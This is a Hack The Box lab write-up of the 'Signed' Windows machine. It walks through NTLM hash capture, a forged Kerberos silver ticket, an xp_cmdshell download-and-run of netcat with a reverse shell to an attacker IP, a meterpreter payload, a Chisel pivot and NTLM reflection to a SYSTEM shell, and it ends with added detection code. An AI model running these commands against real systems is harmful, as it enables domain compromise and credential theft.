Hack The Box / WINDOWS / 2026-03-18
Hack The Box — Signed (Windows)
MSSQL pivot from low-priv credentials, NTLM hash capture/cracking, Kerberos ticket forging for SQL privilege escalation, and NTLM reflection to WinRMS SYSTEM.
Target
- IP: 10.10.11.90
Machine information
As is common in real-life Windows penetration tests, you start the Signed box with credentials for the following account, which can be used to access the MSSQL service:
scott / Sm230#C5NatH
Recon
sudo nmap -sC -sV 10.10.11.90 -p- -v
PORT STATE SERVICE VERSION
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-ntlm-info:
| 10.10.11.90:1433:
| Target_Name: SIGNED
| NetBIOS_Domain_Name: SIGNED
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: SIGNED.HTB
| DNS_Computer_Name: DC01.SIGNED.HTB
| DNS_Tree_Name: SIGNED.HTB
|_ Product_Version: 10.0.17763
| ms-sql-info:
| 10.10.11.90:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-11T19:57:25
| Not valid after: 2055-10-11T19:57:25
| MD5: 743d:e6f0:cc82:0829:4271:9253:df97:077d
|_SHA-1: 2681:3ca6:371c:544e:1b47:89b6:dc01:45c5:fb92:575c
|_ssl-date: 2025-10-11T21:21:21+00:00; +4h57m38s from scanner time.
Add dc01.signed.htb to /etc/hosts.
Initial MSSQL access (scott)
mssqlclient.py -port 1433 'SIGNED'/'scott':'Sm230#C5NatH'@dc01.signed.htb
We get a SQL shell as scott.
SELECT @@version
Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64)
Oct 8 2022 05:58:25
Copyright (C) 2022 Microsoft Corporation
Enterprise Evaluation Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
entity_name subentity_name permission_name
----------- -------------- -----------------
server CONNECT SQL
server VIEW ANY DATABASE
Capture MSSQL service hash with Responder
On the attacker machine, start Responder:
sudo responder -I tun0
In the SQL shell:
EXEC master.sys.xp_dirtree '\\10.10.14.159\myshare',1, 1
On the Responder terminal we get:
[SMB] NTLMv2-SSP Client : 10.10.11.90
[SMB] NTLMv2-SSP Username : SIGNED\mssqlsvc
[SMB] NTLMv2-SSP Hash : mssqlsvc::SIGNED:1e4c40cdf91cac... (rest of the hash omitted)
Put the captured NetNTLMv2 hash into a file named hash and crack it:
hashcat -a 0 ./hash /usr/share/wordlists/rockyou.txt
We get the password:
purPLE9795!@
MSSQL access as mssqlsvc
mssqlclient.py -port 1433 -windows-auth 'SIGNED'/'mssqlsvc':'purPLE9795!@'@dc01.signed.htb
We get a SQL shell as mssqlsvc, with more server permissions than scott had:
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
entity_name subentity_name permission_name
----------- -------------- -------------------------------
server CONNECT SQL
server VIEW ANY DATABASE
server VIEW ANY SECURITY DEFINITION
server VIEW ANY PERFORMANCE DEFINITION
server VIEW ANY DEFINITION
Enumerate users with NetExec
nxc mssql dc01.signed.htb -u 'mssqlsvc' -p 'purPLE9795!@' --rid-brute
MSSQL 10.10.11.90 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:SIGNED.HTB)
MSSQL 10.10.11.90 1433 DC01 [+] SIGNED.HTB\mssqlsvc:purPLE9795!@
MSSQL 10.10.11.90 1433 DC01 498: SIGNED\Enterprise Read-only Domain Controllers
MSSQL 10.10.11.90 1433 DC01 500: SIGNED\Administrator
MSSQL 10.10.11.90 1433 DC01 501: SIGNED\Guest
MSSQL 10.10.11.90 1433 DC01 502: SIGNED\krbtgt
MSSQL 10.10.11.90 1433 DC01 512: SIGNED\Domain Admins
MSSQL 10.10.11.90 1433 DC01 513: SIGNED\Domain Users
MSSQL 10.10.11.90 1433 DC01 514: SIGNED\Domain Guests
MSSQL 10.10.11.90 1433 DC01 515: SIGNED\Domain Computers
MSSQL 10.10.11.90 1433 DC01 516: SIGNED\Domain Controllers
MSSQL 10.10.11.90 1433 DC01 517: SIGNED\Cert Publishers
MSSQL 10.10.11.90 1433 DC01 518: SIGNED\Schema Admins
MSSQL 10.10.11.90 1433 DC01 519: SIGNED\Enterprise Admins
MSSQL 10.10.11.90 1433 DC01 520: SIGNED\Group Policy Creator Owners
MSSQL 10.10.11.90 1433 DC01 521: SIGNED\Read-only Domain Controllers
MSSQL 10.10.11.90 1433 DC01 522: SIGNED\Cloneable Domain Controllers
MSSQL 10.10.11.90 1433 DC01 525: SIGNED\Protected Users
MSSQL 10.10.11.90 1433 DC01 526: SIGNED\Key Admins
MSSQL 10.10.11.90 1433 DC01 527: SIGNED\Enterprise Key Admins
MSSQL 10.10.11.90 1433 DC01 553: SIGNED\RAS and IAS Servers
MSSQL 10.10.11.90 1433 DC01 571: SIGNED\Allowed RODC Password Replication Group
MSSQL 10.10.11.90 1433 DC01 572: SIGNED\Denied RODC Password Replication Group
MSSQL 10.10.11.90 1433 DC01 1000: SIGNED\DC01$
MSSQL 10.10.11.90 1433 DC01 1101: SIGNED\DnsAdmins
MSSQL 10.10.11.90 1433 DC01 1102: SIGNED\DnsUpdateProxy
MSSQL 10.10.11.90 1433 DC01 1103: SIGNED\mssqlsvc
MSSQL 10.10.11.90 1433 DC01 1104: SIGNED\HR
MSSQL 10.10.11.90 1433 DC01 1105: SIGNED\IT
MSSQL 10.10.11.90 1433 DC01 1106: SIGNED\Finance
MSSQL 10.10.11.90 1433 DC01 1107: SIGNED\Developers
MSSQL 10.10.11.90 1433 DC01 1108: SIGNED\Support
MSSQL 10.10.11.90 1433 DC01 1109: SIGNED\oliver.mills
MSSQL 10.10.11.90 1433 DC01 1110: SIGNED\emma.clark
MSSQL 10.10.11.90 1433 DC01 1111: SIGNED\liam.wright
MSSQL 10.10.11.90 1433 DC01 1112: SIGNED\noah.adams
MSSQL 10.10.11.90 1433 DC01 1113: SIGNED\ava.morris
MSSQL 10.10.11.90 1433 DC01 1114: SIGNED\sophia.turner
MSSQL 10.10.11.90 1433 DC01 1115: SIGNED\james.morgan
MSSQL 10.10.11.90 1433 DC01 1116: SIGNED\mia.cooper
MSSQL 10.10.11.90 1433 DC01 1117: SIGNED\elijah.brooks
MSSQL 10.10.11.90 1433 DC01 1118: SIGNED\isabella.evans
MSSQL 10.10.11.90 1433 DC01 1119: SIGNED\lucas.murphy
MSSQL 10.10.11.90 1433 DC01 1120: SIGNED\william.johnson
MSSQL 10.10.11.90 1433 DC01 1121: SIGNED\charlotte.price
MSSQL 10.10.11.90 1433 DC01 1122: SIGNED\henry.bennett
MSSQL 10.10.11.90 1433 DC01 1123: SIGNED\amelia.kelly
MSSQL 10.10.11.90 1433 DC01 1124: SIGNED\jackson.gray
MSSQL 10.10.11.90 1433 DC01 1125: SIGNED\harper.diaz
MSSQL 10.10.11.90 1433 DC01 1126: SIGNED\SQLServer2005SQLBrowserUser$DC01
We can put users into a file with:
nxc mssql dc01.signed.htb -u 'mssqlsvc' -p 'purPLE9795!@' --rid-brute | cut -d: -f 2 | cut -d \\ -f2 | tail -n +3 > users.txt
SID extraction and ticket forging context
Useful site:
- https://codeplacer.wordpress.com/2018/08/27/get-sid-from-active-directory-using-ms-sql-server/
SELECT SUSER_SID('SIGNED\mssqlsvc')
b'0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000'
We can convert this binary SID to its string form with the Win32 API ConvertSidToStringSidA (Advapi32.lib) on Windows:
- https://learn.microsoft.com/en-us/windows/win32/api/sddl/nf-sddl-convertsidtostringsida
- See the attached program convert_sid.cpp and run it.
We get this string:
S-1-5-21-4088429403-1159899800-2753317549-1103
So the domain SID is:
S-1-5-21-4088429403-1159899800-2753317549
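As an added example (not code from the page, and not the attached convert_sid.cpp), the same conversion in pure Python so it can be done on the attacking Linux host without Advapi32: it parses the SID structure returned by SUSER_SID() (revision, sub-authority count, 6-byte big-endian identifier authority, little-endian 32-bit sub-authorities) and splits off the domain SID and RID. The hex value is the page's own; the function names are mine.

```python
import struct
from typing import Tuple

# Value returned by SELECT SUSER_SID('SIGNED\mssqlsvc') on the page, which
# mssqlclient prints as a Python bytes literal b'0105...'; kept as hex here.
SUSER_SID_HEX = "0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000"


def sid_bytes_to_string(sid: bytes) -> str:
    """Decode a binary Windows SID into its S-R-A-S1-S2-... string form.

    Layout: revision (1 byte), sub-authority count (1 byte), identifier
    authority (6 bytes, big-endian), then count x 32-bit little-endian
    sub-authorities.
    """
    if len(sid) < 8:
        raise ValueError("SID too short")
    revision, count = sid[0], sid[1]
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    if len(sid) != 8 + 4 * count:
        raise ValueError("sub-authority count does not match length")
    authority = int.from_bytes(sid[2:8], "big")
    subs = struct.unpack("<%dI" % count, sid[8:])
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def split_domain_sid(sid_string: str) -> Tuple[str, int]:
    """Split 'S-1-5-21-a-b-c-RID' into (domain SID, RID)."""
    head, _, rid = sid_string.rpartition("-")
    if not head.startswith("S-1-5-21-"):
        raise ValueError("not a domain (S-1-5-21) account SID")
    return head, int(rid)


def decode_suser_sid(value: str) -> Tuple[str, str, int]:
    """Accept raw hex or the b'...' literal mssqlclient shows; return
    (full string SID, domain SID, RID)."""
    value = value.strip()
    if value.startswith("b'") and value.endswith("'"):
        value = value[2:-1]
    full = sid_bytes_to_string(bytes.fromhex(value))
    domain, rid = split_domain_sid(full)
    return full, domain, rid


if __name__ == "__main__":
    full, domain, rid = decode_suser_sid(SUSER_SID_HEX)
    print("account SID:", full)   # RID 1103 is mssqlsvc in the rid-brute output
    print("domain SID :", domain)
    print("RID        :", rid)
```

The decoder is generic: any SUSER_SID() result (or a SID pulled from LDAP objectSid) decodes the same way, and well-known SIDs such as S-1-5-18 come out correctly because the authority and sub-authority fields are parsed rather than assumed.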
The password purPLE9795!@ converted to an NT hash:
ef699384c3285c54128a3ee1ddb1a0cc
Here is information about MSSQL SPNs:
- https://learn.microsoft.com/en-us/sql/relational-databases/native-client/features/service-principal-name-spn-support-in-client-connections?view=sql-server-ver15
Forge Kerberos ticket for MSSQL
ticketer.py -domain signed.htb -domain-sid 'S-1-5-21-4088429403-1159899800-2753317549' -nthash 'ef699384c3285c54128a3ee1ddb1a0cc' -spn 'mssqlsvc/dc01.signed.htb:1433' 'mssqlsvc'
[*] Saving ticket in mssqlsvc.ccache
export KRB5CCNAME='mssqlsvc.ccache'
mssqlclient.py -port 1433 -windows-auth -k -no-pass dc01.signed.htb
SQL (SIGNED\Administrator guest@master)>
We get an MSSQL shell whose login is SIGNED\Administrator, but the prompt shows we are only guest in master.
SELECT is_srvrolemember('sysadmin');
0
We are not sysadmin, so we cannot do much yet.
Check who is sysadmin:
SELECT name,type_desc,is_disabled FROM master.sys.server_principals WHERE IS_SRVROLEMEMBER ('sysadmin',name) = 1 ORDER BY name
name type_desc is_disabled
------------------------- ------------- -----------
NT SERVICE\MSSQLSERVER WINDOWS_LOGIN 0
NT SERVICE\SQLSERVERAGENT WINDOWS_LOGIN 0
NT SERVICE\SQLWriter WINDOWS_LOGIN 0
NT SERVICE\Winmgmt WINDOWS_LOGIN 0
sa SQL_LOGIN 0
SIGNED\IT WINDOWS_GROUP 0
The IT group is sysadmin. With the ticketer option -groups we can add group RIDs to the forged ticket's PAC; from the rid-brute output above, IT has RID 1105.
ticketer.py -domain signed.htb -domain-sid 'S-1-5-21-4088429403-1159899800-2753317549' -nthash 'ef699384c3285c54128a3ee1ddb1a0cc' -spn 'mssqlsvc/dc01.signed.htb:1433' -groups 1105 'mssqlsvc'
[*] Saving ticket in mssqlsvc.ccache
mssqlclient.py -port 1433 -windows-auth -k -no-pass dc01.signed.htb
SQL (SIGNED\Administrator dbo@master)>
Now we have a shell as dbo in the database.
SELECT is_srvrolemember('sysadmin');
1
Command execution and reverse shell from MSSQL
Now we can try to get a reverse shell.
Start listener and HTTP server:
rlwrap nc -vlnp 4444
python3 -m http.server 5555
Upload nc64.exe (https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe) to the victim machine and execute it:
enable_xp_cmdshell
xp_cmdshell mkdir C:\tmp
xp_cmdshell curl http://10.10.14.18:5555/nc64.exe -o C:\tmp\nc64.exe
xp_cmdshell C:\tmp\nc64.exe -e cmd.exe 10.10.14.18 4444
We get a reverse shell.
whoami
signed\mssqlsvc
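From the defender's side, both the xp_dirtree coercion earlier (which made the SQL Server service account authenticate to an attacker SMB share) and the xp_cmdshell enablement and execution above leave statements in a SQL Server audit. The following added example, which is not from the page, runs a small set of detection rules over a constructed, flat "timestamp | login | statement" export (an assumed format for the demo, not SQL Server's own audit format). The statements mirror the ones run in the walkthrough plus one benign xp_dirtree against a constructed, allow-listed internal file server; the host names svc_backup and fileserver01.signed.htb are made up.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# Constructed sample export (assumed layout: "timestamp | login | statement").
SAMPLE_LOG = """\
2025-10-11T21:20:01Z | SIGNED\\scott | SELECT @@version
2025-10-11T21:20:05Z | SIGNED\\scott | SELECT * FROM fn_my_permissions(NULL, 'SERVER')
2025-10-11T21:21:10Z | SIGNED\\scott | EXEC master.sys.xp_dirtree '\\\\10.10.14.159\\myshare',1, 1
2025-10-11T21:40:00Z | SIGNED\\svc_backup | EXEC xp_dirtree '\\\\fileserver01.signed.htb\\backups', 1, 1
2025-10-11T22:02:11Z | SIGNED\\Administrator | EXEC sp_configure 'show advanced options', 1
2025-10-11T22:02:12Z | SIGNED\\Administrator | EXEC sp_configure 'xp_cmdshell', 1
2025-10-11T22:02:30Z | SIGNED\\Administrator | xp_cmdshell 'curl http://10.10.14.18:5555/nc64.exe -o C:\\tmp\\nc64.exe'
2025-10-11T22:02:40Z | SIGNED\\Administrator | xp_cmdshell 'C:\\tmp\\nc64.exe -e cmd.exe 10.10.14.18 4444'
"""

# Extended procedures that take a path; with a UNC path the SQL Server service
# account authenticates outbound to that host (the coercion used on the page).
UNC_COERCION_PROCS = ("xp_dirtree", "xp_fileexist", "xp_subdirs")
UNC_RE = re.compile(r"\\\\([0-9A-Za-z.\-]+)")          # host part of \\host\share
XP_CMDSHELL_ENABLE_RE = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1")

# Constructed allow-list of servers the SQL service legitimately reaches.
TRUSTED_FILE_SERVERS: Set[str] = {"fileserver01.signed.htb"}


@dataclass
class Finding:
    timestamp: str
    login: str
    rule: str
    severity: str
    detail: str


def parse_line(line: str) -> Optional[Tuple[str, str, str]]:
    """Split one export line into (timestamp, login, statement)."""
    parts = [p.strip() for p in line.split("|", 2)]
    if len(parts) != 3 or not all(parts):
        return None
    return parts[0], parts[1], parts[2]


def analyse(log_text: str, trusted_hosts: Set[str] = TRUSTED_FILE_SERVERS) -> List[Finding]:
    """Apply the three rules to every line and return findings in log order."""
    findings: List[Finding] = []
    for raw in log_text.splitlines():
        parsed = parse_line(raw)
        if parsed is None:
            continue
        ts, login, stmt = parsed
        low = stmt.lower()

        # Rule 1: path-taking extended procedure pointed at a UNC path.
        proc = next((p for p in UNC_COERCION_PROCS if p in low), None)
        if proc is not None:
            m = UNC_RE.search(stmt)
            if m:  # local paths produce no finding; UNC paths do
                host = m.group(1)
                sev = "low" if host.lower() in trusted_hosts else "high"
                findings.append(Finding(ts, login, "unc-coercion", sev, f"{proc} to \\\\{host}"))

        # Rule 2: xp_cmdshell switched on; Rule 3: xp_cmdshell actually used.
        if XP_CMDSHELL_ENABLE_RE.search(low):
            findings.append(Finding(ts, login, "xp_cmdshell-enabled", "high", stmt))
        elif "xp_cmdshell" in low:
            findings.append(Finding(ts, login, "xp_cmdshell-exec", "high", stmt))
    return findings


def summarise(findings: List[Finding]) -> Dict[str, int]:
    """Count findings per severity."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.severity] = counts.get(f.severity, 0) + 1
    return counts


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"{f.timestamp} {f.severity:4} {f.rule:20} {f.login}: {f.detail}")
    print(summarise(analyse(SAMPLE_LOG)))
```

The allow-list is what keeps the rule usable: xp_dirtree against a known file server is routine, whereas a UNC path to an address that is not a file server at all (here the attacker's 10.10.14.159) is exactly the outbound-NTLM pattern Responder relies on, so it is scored high regardless of which login issued it.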
Meterpreter shell
Generate payload:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o reverse.exe
Start Metasploit handler:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST tun0
run
Upload reverse.exe to the victim and execute it.
We get a reverse Meterpreter shell.
From Meterpreter we can then spawn additional command shells with the shell command.
Host information
Get Windows version information:
(Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion") | Select-Object -Property *
CurrentBuild : 17763
ProductName : Windows Server 2019 Standard
ReleaseId : 1809
UBR : 7314
BloodHound collection
Download SharpHound.exe (https://github.com/SpecterOps/SharpHound) and upload it to the victim machine.
Run SharpHound on victim:
.\SharpHound.exe
A zip file is created.
To download it to our machine, we can use impacket's smbserver.py:
smbserver.py -smb2support -username test12 -password test12 share $(pwd)
On victim machine run:
net use \\10.10.14.18\share test12 /USER:test12
cp 20251028162738_BloodHound.zip \\10.10.14.18\share\
Start BloodHound:
sudo bloodhound
SOCKS pivot with Chisel
To access various open ports on the victim host, use Chisel in SOCKS proxy mode.
Download Chisel (https://github.com/jpillora/chisel) and upload the Windows version to the victim.
On attacker machine:
./chisel_linux server -p 9999 --reverse
On victim machine:
.\chisel_windows.exe client 10.10.14.18:9999 R:socks
Now edit /etc/proxychains4.conf and add:
socks5 127.0.0.1 1080
Comment out any other lines for other SOCKS proxies.
Now, for example, we can access SMB:
proxychains nxc smb 10.10.11.90 -d signed.htb -u 'mssqlsvc' -p 'purPLE9795!@'
SMB 10.10.11.90 445 DC01 [+] signed.htb\mssqlsvc:purPLE9795!@
Check LDAP signing and channel binding with the ldap-checker module:
proxychains nxc ldap 10.10.11.90 -d signed.htb -u 'mssqlsvc' -p 'purPLE9795!@' -M ldap-checker
LDAP 10.10.11.90 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:SIGNED.HTB)
LDAP 10.10.11.90 389 DC01 [+] signed.htb\mssqlsvc:purPLE9795!@
LDAP-CHE... 10.10.11.90 389 DC01 LDAP signing NOT enforced
LDAP-CHE... 10.10.11.90 389 DC01 [-] signed.htb - TLS handshake failed; certificate likely not configured
In the shell on the victim machine:
netstat -a -p tcp
We notice:
TCP 0.0.0.0:5986 DC01:0 LISTENING
Port 5986 is WinRM over HTTPS (WinRMS).
We can try an NTLM self-reflection attack as explained here:
- https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
NTLM reflection to WinRMS SYSTEM
Download bloodyad:
- https://github.com/CravateRouge/bloodyAD
Add malicious DNS record:
proxychains python3 bloodyAD/bloodyAD.py --host dc01.signed.htb -d signed.htb --dc-ip 10.10.11.90 -u 'mssqlsvc' -p 'purPLE9795!@' add dnsRecord 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' 10.10.14.18
[+] localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA has been successfully added
Start relay:
proxychains ntlmrelayx.py -t winrms://dc01.signed.htb -smb2support --interactive
Trigger coercion:
proxychains coercer coerce -l 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' -t 10.10.11.90 -u 'mssqlsvc' -p 'purPLE9795!@' -d signed.htb -v --always-continue
In ntlmrelayx.py terminal we get:
[*] HTTP server returned error code 500, this is expected, treating as a successful login
[*] (SMB): Authenticating connection from /@10.10.11.90 against winrms://dc01.signed.htb SUCCEED [1]
[*] winrms:///@dc01.signed.htb [1] -> Started interactive WinRMS shell via TCP on 127.0.0.1:11000
Connect:
nc 127.0.0.1 11000
We have a shell.
whoami
nt authority\system
We can read the root flag:
type C:\Users\Administrator\Desktop\root.txt
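The DNS record added at the start of this chain is the detectable artefact of the technique: its name is a host label followed by a base64 blob, and base64-decoding that blob (the page's own 1UWhRCAA... string) yields bytes beginning d5 45 a1 44, which is the magic at the start of a marshalled target-information structure that no ordinary host ever registers as a DNS name. The following added example, not from the page or from bloodyAD, scans a constructed list of dnsNode names (as a zone export would list them) for that marker; the other names in the list are made up.

```python
import base64
import binascii
import re
from typing import Iterable, List, Optional

# First four bytes of the decoded base64 suffix of the record name on the page.
MARSHALLED_TI_MAGIC = bytes.fromhex("d545a144")

B64_RUN = re.compile(r"[A-Za-z0-9+/]+")   # maximal runs of base64-alphabet chars

# Constructed zone listing: only the third entry is the attack artefact.
SAMPLE_RECORD_NAMES = [
    "dc01",
    "fileserver01",
    "localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA",
    "_ldap._tcp.dc._msdcs",
    "build-agent-0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJ",
]


def marshalled_blob(name: str) -> Optional[bytes]:
    """Return the decoded blob if any base64 run inside the name, taken from
    any start offset (the host label length is unknown), decodes to bytes
    beginning with the marshalled-target magic; otherwise None."""
    for run in B64_RUN.findall(name):
        for start in range(len(run)):
            chunk = run[start:]
            chunk = chunk[: len(chunk) - len(chunk) % 4]   # base64 needs 4-char groups
            if len(chunk) < 8:
                break
            try:
                blob = base64.b64decode(chunk, validate=True)
            except (binascii.Error, ValueError):
                continue
            if blob.startswith(MARSHALLED_TI_MAGIC):
                return blob
    return None


def flag_records(names: Iterable[str]) -> List[str]:
    """Names that embed a marshalled target-information blob."""
    return [n for n in names if marshalled_blob(n) is not None]


if __name__ == "__main__":
    for name in flag_records(SAMPLE_RECORD_NAMES):
        print("suspicious dnsNode:", name, marshalled_blob(name)[:8].hex())
```

Because low-privileged domain users can create DNS records by default, this check belongs next to the ldap-checker result above: a marshalled-name record plus LDAP signing not enforced is the combination the relay needs, so either condition alone is worth an alert and both together are worth an incident.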
Interesting notes
View logs of the last 20 scheduled task events
Get-WinEvent -LogName Microsoft-Windows-TaskScheduler/Operational -MaxEvents 20 | Format-List TimeCreated, Id, Message